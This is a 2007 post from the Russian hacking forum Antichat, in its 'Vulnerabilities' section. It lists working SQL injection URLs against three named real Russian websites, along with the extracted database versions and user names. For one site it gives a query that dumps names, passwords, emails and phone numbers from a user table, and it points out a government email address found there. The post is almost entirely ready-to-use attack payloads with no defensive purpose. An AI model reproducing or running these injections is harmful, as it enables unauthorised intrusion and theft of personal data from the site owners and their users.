ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 26.10.2007, 13:38
Аватар для fRg
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

www.civitas.ru - Всероссийский Гражданский Конгресс
Код:
http://www.civitas.ru/newsprint.php?code=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(version(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(database(),0x71),0x71),0x3a,aes_decrypt(aes_encrypt(user(),0x71),0x71)),4,5,6,7,8,9,10/*
5.0.18:congress:alik@localhost
663 таблицы:
Код:
http://www.civitas.ru/newsprint.php?code=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(table_name,0x71),0x71)),4,5,6,7,8,9,10+from+information_schema.tables+limit+662,1/*
Копался в таблицах - нашёл табу person.
Данные из person в формате "имя:пасс:мыло:телефон:web":
Код:
http://www.civitas.ru/newsprint.php?code=-1+union+select+1,2,concat(aes_decrypt(aes_encrypt(name,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(pass,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(email,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(phone,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(web,0x71),0x71)),4,5,6,7,8,9,10+from+person+limit+0,1/*
интересные ящики попадаются "Novitskiy@duma.mos.ru"
www.gost.net.ru - БД ГОСТы
Код:
http://www.gost.net.ru/download.php?fFolder=57&fFrom=katalog&fItem=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13/*
4.1.20:db000030:u000030@localhost
www.sportclubmai.ru - СПОРТКЛУБ МАИ
Код:
http://www.sportclubmai.ru/admin/admin_news/long_news.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*
4.0.27-standard:db_sportclubmai:sportclubmai@localhost
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ